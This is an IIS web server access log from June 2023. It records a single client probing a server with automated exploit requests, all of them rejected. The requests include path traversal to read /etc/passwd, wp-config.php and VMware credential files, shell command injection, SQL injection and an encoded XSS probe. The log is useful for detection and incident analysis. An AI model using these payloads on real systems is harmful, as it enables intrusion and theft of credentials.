2023-06-24 14:12:17 103.153.214.94 GET /content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 5 0 44
2023-06-24 14:12:17 103.153.214.94 GET /..;/content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 5 0 41
2023-06-24 14:12:33 103.153.214.94 GET /wp-content/plugins/usc-e-shop/functions/content-log.php logfile=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 42
2023-06-24 14:12:33 103.153.214.94 GET /wp-content/plugins/usc-e-shop/functions/content-log.php logfile=/Windows/win.ini 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 37
2023-06-24 14:25:17 103.153.214.94 GET /wp-content/plugins/wp-source-control/downloadfiles/download.php path=../../../../wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 46
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 15:26:26
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 15:26:26 103.153.214.94 POST /contactus.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 29
2023-06-24 15:30:00 103.153.214.94 GET /api/users/search_authors - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 29
2023-06-24 15:31:42 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 26
2023-06-24 15:33:46 103.153.214.94 POST /dip/api/login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 30
2023-06-24 15:34:06 103.153.214.94 GET /login.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 26
2023-06-24 15:38:42 103.153.214.94 GET /index.php/bbs/index/download local=1&amp;name=1.txt&amp;url=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 28
2023-06-24 15:39:12 103.153.214.94 GET /chkisg.htm?Sip=1.1.1.1+|+cat+/etc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 400 0 0 38
2023-06-24 15:40:40 103.153.214.94 GET /filemanager/ajax_calls.php action=get_file&amp;file=../../../../etc/passwd&amp;preview_mode=text&amp;sub_action=preview&amp;title=source 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 29
2023-06-24 15:41:20 103.153.214.94 GET /__ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 28
2023-06-24 15:47:24 103.153.214.94 GET /Export_Log /etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 36
2023-06-24 15:47:34 103.153.214.94 GET /command.cgi cat%20/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 28
2023-06-24 15:48:50 103.153.214.94 GET /index.php option=com_jacomment&amp;view=../../../../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 29
2023-06-24 15:49:02 103.153.214.94 GET /index.php controller=../../../../../../../../../etc/passwd&amp;option=com_omphotogallery 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 23
2023-06-24 16:00:56 103.153.214.94 POST /oauth/token - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 26
2023-06-24 16:00:56 103.153.214.94 POST /oauth/token - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 24
2023-06-24 16:00:56 103.153.214.94 POST /oauth/token - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 26
2023-06-24 16:00:56 103.153.214.94 POST /oauth/token - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 23
2023-06-24 16:00:56 103.153.214.94 POST /oauth/token - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 23
2023-06-24 16:00:56 103.153.214.94 POST /oauth/token - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 24
2023-06-24 16:02:24 103.153.214.94 GET /_profiler/empty/search/results limit=10 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 30
2023-06-24 16:02:24 103.153.214.94 GET /app_dev.php/_profiler/empty/search/results limit=10 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 25
2023-06-24 16:10:34 103.153.214.94 POST / BazaR&amp;action=saisir_fiche&amp;id=2&amp;vue=saisir 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 26
2023-06-24 16:10:34 103.153.214.94 GET / BazaR&amp;vue=consulter 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 22
2023-06-24 16:13:38 103.153.214.94 GET /info.html - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 32
2023-06-24 16:13:38 103.153.214.94 GET /cgi/cgi_i_filter.js _tn={{trimprefix(base64_decode(httoken), 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 34
2023-06-24 16:25:10 103.153.214.94 GET /register/toDownload.do fileName=../../../../../../../../../../../../../../windows/win.ini 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 32
2023-06-24 16:25:10 103.153.214.94 GET /register/toDownload.do fileName=../../../../../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 21
2023-06-24 16:27:26 103.153.214.94 GET /index.php controller=../../../../../../../../../../../../../etc/passwd%00&amp;option=com_properties 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 28
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 17:20:52
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 17:20:52 103.153.214.94 GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php file=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 64
2023-06-24 17:21:02 103.153.214.94 POST /php/login.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 25
2023-06-24 17:23:16 103.153.214.94 POST /minio/webrpc - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 31
2023-06-24 17:28:10 103.153.214.94 GET /nacos/v1/cs/ops/derby sql=select+st.tablename+from+sys.systables+st 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 27
2023-06-24 17:33:46 103.153.214.94 GET /page/sl_logdl dbkey%3Asyslog.rlog=/etc/passwd&amp;dcfct=DCMlog.download_log 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 30
2023-06-24 17:34:13 103.153.214.94 GET /wp-json/wp/v2/lesson/1 - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 29
2023-06-24 17:39:56 103.153.214.94 GET /install - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 28
2023-06-24 17:41:46 103.153.214.94 GET /admin/requests/take_action.php id=6&#039;+UNION+ALL+SELECT+md5(&#039;999999999&#039;),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 28
2023-06-24 17:43:38 103.153.214.94 POST /royal_event/companyprofile.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 28
2023-06-24 17:49:05 103.153.214.94 GET /wp-content/plugins/zip-attachments/download.php za_file=../../../../../etc/passwd&amp;za_filename=passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 35
2023-06-24 17:51:12 103.153.214.94 GET /index.php q=hiring&amp;search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19--+ 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 30
2023-06-24 17:55:42 103.153.214.94 GET /js/salesforce.js - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 28
2023-06-24 17:55:42 103.153.214.94 GET /salesforce.js - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 23
2023-06-24 18:00:34 103.153.214.94 POST /login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 26
2023-06-24 18:00:34 103.153.214.94 POST /login - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 24
2023-06-24 18:06:00 103.153.214.94 GET /wp-content/force-download.php file=../wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 26
2023-06-24 18:08:52 103.153.214.94 POST /index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27
2023-06-24 18:08:52 103.153.214.94 POST /adminer.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 23
2023-06-24 18:08:52 103.153.214.94 POST /adminer/adminer.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 23
2023-06-24 18:08:52 103.153.214.94 POST /adminer/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 24
2023-06-24 18:08:52 103.153.214.94 POST /_adminer.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 23
2023-06-24 18:08:52 103.153.214.94 POST /_adminer/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 23
2023-06-24 18:13:56 103.153.214.94 GET /cgi-bin/user/Config.cgi .cab&amp;action=get&amp;category=Account.* 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 30
2023-06-24 18:13:56 103.153.214.94 GET /cgi-bin/user/Config.cgi /nobody&amp;action=get&amp;category=Account.* 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 23
2023-06-24 18:18:34 103.153.214.94 GET /installer - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 30
2023-06-24 18:28:56 103.153.214.94 GET / c=../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 25
2023-06-24 18:28:56 103.153.214.94 GET /badging/badge_print_v0.php tpl=../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 26
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 18:57:07
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 18:57:06 103.153.214.94 POST /control/login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 30
2023-06-24 19:02:12 103.153.214.94 POST /texteditor.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 28
2023-06-24 19:07:12 103.153.214.94 GET /webEdition/showTempFile.php file=../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 36
2023-06-24 19:11:08 103.153.214.94 POST /api/auth/login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 28
2023-06-24 19:25:00 103.153.214.94 POST /casa/nodes/thumbprints - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 27
2023-06-24 19:26:26 103.153.214.94 POST /cu.html - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 27
2023-06-24 19:36:29 103.153.214.94 POST /api/v4/ci/lint include_merged_yaml=true 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 34
2023-06-24 19:38:33 103.153.214.94 GET /photoalbum/index.php url=../../../../../../../../../../../../etc/passwd%00&amp;urlancien 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 32
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 19:57:23
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 19:57:23 103.153.214.94 GET /admin/airflow/code dag_id=example_passing_params_via_test_command&amp;root 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 31
2023-06-24 19:57:23 103.153.214.94 GET /code dag_id=example_passing_params_via_test_command 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 24
2023-06-24 20:01:47 103.153.214.94 GET /opensis/ajax.php bypass=Transcripts.php&amp;modname=misc/../../../../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 32
2023-06-24 20:01:47 103.153.214.94 GET /ajax.php bypass=Transcripts.php&amp;modname=misc/../../../../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 24
2023-06-24 20:05:23 103.153.214.94 PUT /api/2.0/services/usermgmt/password/alctqk - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 33
2023-06-24 20:05:23 103.153.214.94 PUT /api/2.0/services/usermgmt/password/alctqk - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 22
2023-06-24 20:12:21 103.153.214.94 GET /services/pluginscript/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 28
2023-06-24 20:12:22 103.153.214.94 GET /services/pluginscript/..;/..;/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 5 0 24
2023-06-24 20:12:23 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 24
2023-06-24 20:22:03 103.153.214.94 GET /eam/vib id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 28
2023-06-24 20:22:03 103.153.214.94 GET /eam/vib id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 31
2023-06-24 20:22:03 103.153.214.94 GET /eam/vib id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 23
2023-06-24 20:30:29 103.153.214.94 POST /hms/admin/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 28
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 20:49:41
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 20:49:40 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&amp;option=com_lovefactory 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 26
2023-06-24 20:51:42 103.153.214.94 GET /cgi-bin/koha/svc/virtualshelves/search template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 29
2023-06-24 21:04:04 103.153.214.94 GET /wp-content/plugins/localize-my-post/ajax/include.php file=../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 30
2023-06-24 21:06:06 103.153.214.94 GET /test.txt - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 29
2023-06-24 21:12:21 103.153.214.94 GET /api/change_setting disable_sequence=true&amp;second_value=no_reload&amp;value=../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 25
2023-06-24 21:12:40 103.153.214.94 POST /sysmgmt/2015/bmc/session - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 30
2023-06-24 21:20:22 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 26
2023-06-24 21:20:22 103.153.214.94 GET / page=step_1 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 25
2023-06-24 21:24:11 103.153.214.94 GET /anything_here - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 25
2023-06-24 21:26:26 103.153.214.94 GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 11 0 28
2023-06-24 21:32:15 103.153.214.94 GET /admin/ id=1&#039;+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+&#039;rogN&#039;=&#039;rogN&amp;page=requests/manage_request 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 33
2023-06-24 21:46:48 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&amp;option=com_jfeedback 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 27
2023-06-24 21:47:32 103.153.214.94 GET /admin/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 28
